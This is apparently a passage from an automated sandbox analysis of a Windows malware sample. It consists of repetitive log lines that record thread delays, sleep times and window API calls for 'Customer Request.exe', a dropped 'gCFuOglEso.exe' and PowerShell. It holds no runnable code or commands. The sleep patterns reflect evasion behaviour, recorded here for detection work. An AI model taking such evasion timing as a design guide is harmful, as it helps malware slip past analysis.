                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597234
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597125
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597015
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 596896
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 596767
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 596625
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595953
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595828
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595719
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595608
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595500
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595390
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595281
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595172
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595062
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594953
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594844
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594719
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594609
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594500
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594390
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594280
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594172
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594062
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 593953
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 593826
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 593703
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 593585
                  Source: C:\Users\user\Desktop\Customer Request.exeWindow / User API: threadDelayed 851Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeWindow / User API: threadDelayed 975Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6104Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1070Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6681Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1281Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeWindow / User API: threadDelayed 4569Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeWindow / User API: threadDelayed 5242Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeWindow / User API: foregroundWindowGot 1765Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeWindow / User API: threadDelayed 412
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeWindow / User API: threadDelayed 1332
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeWindow / User API: threadDelayed 2785
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeWindow / User API: threadDelayed 7064
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -239843s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -239731s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -239624s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -239515s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -239406s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -239269s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -239140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -238996s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -238848s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -238718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -238437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -238031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -237484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -237371s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -237218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -237062s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 2500Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3524Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3796Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep count: 6681 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1736Thread sleep count: 1281 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6192Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4352Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -599891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -599671s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -599562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -599451s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -599344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -599235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -599110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -598985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -598860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -598735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -598610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -598485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -598360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -598235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -598110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -597985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -597860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -597736s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -597610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -597485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -597361s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -597167s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -597041s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -596640s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -596531s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -596422s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -596313s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -596188s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -596063s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -595938s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -595813s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -595703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -595594s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -595469s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -595360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -595235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -595110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -594985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -594860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -594735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -594610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -594485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -594360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -594235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -594110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -593938s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -593799s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -593672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -593563s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -593438s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -240000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -239870s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -239764s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -239640s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -239531s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -239421s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -239310s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -239202s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -239079s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -238959s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7260Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -31359464925306218s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -599890s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -599598s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -599469s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -599354s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -599248s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -599123s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -599003s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -598875s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -598765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -598652s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -598546s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -598437s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -598328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -598218s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -598109s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -598000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -597890s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -597781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -597672s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -597562s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -597453s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -597343s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -597234s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -597125s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -597015s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -596896s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -596767s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -596625s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -595953s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -595828s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -595719s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -595608s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -595500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -595390s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -595281s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -595172s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -595062s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -594953s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -594844s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -594719s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -594609s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -594500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -594390s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -594280s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -594172s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -594062s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -593953s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -593826s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -593703s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -593585s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 240000Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239843Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239731Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239624Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239515Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239406Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239269Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239140Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 238996Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 238848Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 238718Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 238437Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 238031Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 237484Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 237371Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 237218Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 237062Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 599451Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 599235Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 599110Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 598985Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 598860Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 598735Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 598610Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 597736Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 597361Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 597167Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 597041Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 596640Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 596531Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 596422Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 596313Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 596188Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 596063Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 595938Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 595813Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 595703Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 595594Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 595469Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 593938Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 593799Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 593672Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 593563Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 593438Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 240000
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239870
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239764
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239640
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239531
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239421
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239310
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239202
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239079
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 238959
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599890
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599598
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599469
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599354
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599248
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599123
